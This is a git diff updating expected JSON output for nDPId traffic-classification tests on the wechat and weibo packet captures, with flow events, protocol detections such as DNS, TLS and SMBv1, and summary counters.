00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1492171291761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1492171291761,"pkt":"8IQvSpdgeJKcD6iOCABFAABIMrNAAEARgzzAqAFnwKgB\/tELADUANPxl\/4EBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171205448,"flow_last_seen":1492171205448,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171203806,"flow_last_seen":1492171203806,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492171176772,"flow_last_seen":1492171271288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171267430,"flow_last_seen":1492171267430,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":59567,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171269548,"flow_last_seen":1492171269548,"flow_idle_time":200000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171267294,"flow_last_seen":1492171269750,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":45366,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -639,8 +637,8 @@ 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1492167905561,"flow_last_seen":1492167907207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167352068,"flow_last_seen":1492167892851,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1492167342893,"flow_last_seen":1492167478295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6421,"flow_avg_l4_payload_len":188,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1492167353674,"flow_last_seen":1492167907140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":65142,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Tencent","breed":"Acceptable","category":"SocialNetwork"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492171176772,"flow_last_seen":1492171269192,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -671,7 +669,7 @@ 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492171168104,"flow_last_seen":1492171267294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167377896,"flow_last_seen":1492167468048,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.142","src_port":49787,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-payload-len":561272,"total-not-detected-flows":0,"total-guessed-flows":25,"total-detected-flows":84,"total-detection-updates":67,"total-updates":5,"current-active-flows":0,"total-active-flows":109,"total-idle-flows":109,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":674,"global_ts_msec":1492171291761} +00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1672,"packets-processed":1672,"total-skipped-flows":0,"total-l4-payload-len":561272,"total-not-detected-flows":0,"total-guessed-flows":25,"total-detected-flows":84,"total-detection-updates":65,"total-updates":5,"current-active-flows":0,"total-active-flows":109,"total-idle-flows":109,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":672,"global_ts_msec":1492171291761} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1672/1672 ~~ skipped flows.............: 0 @@ -680,9 +678,9 @@ ~~ total active/idle flows...: 109/109 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6273294 bytes -~~ total memory freed........: 6273294 bytes -~~ total allocations/frees...: 120783/120783 +~~ total memory allocated....: 6406928 bytes +~~ total memory freed........: 6406928 bytes +~~ total allocations/frees...: 123545/123545 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 2275 chars diff --git a/test/results/weibo.pcap.out b/test/results/weibo.pcap.out index 696144044..bd7b2fbfc 100644 --- a/test/results/weibo.pcap.out +++ b/test/results/weibo.pcap.out @@ -16,9 +16,9 @@ 00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1463089070756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1463089070756,"pkt":"kDVu60UQeJKcD6iOCABFAAEhMGVAAEARnDfAqAFp2DrS49GYAbsBDYkQDLva88\/LUhUgJkcz8vG4Z\/IO+VkPDhG6AFD7bU7A+qqkwZ+x\/RvFauDbIOOJtwCjXyUObeUIn5gQ+UX+x65qNOazAz\/4wVrPUNQeyvpM\/apVfaPKE\/BWwazlUXoAI5VQNixlUUJ1awnxsfIGiNrCTSIptZgAvLyXtwp5hhxDz3XyJujNKh8y4KxdXT+KUDUJOJJnUi42xAE7YEaRgCG0Gsvcv8KKqXj17ZhXhBURaPrZodsQJCbjs8pPzHSHwv2KhOv\/hmenV+Y+4AoEiGoPjQoanC+Mp48jh+wIc24blOr9i\/xboxYy\/SLPPtKSsAsklxNqe9J5gUDokozUo9KiuHi4kWMZ"} 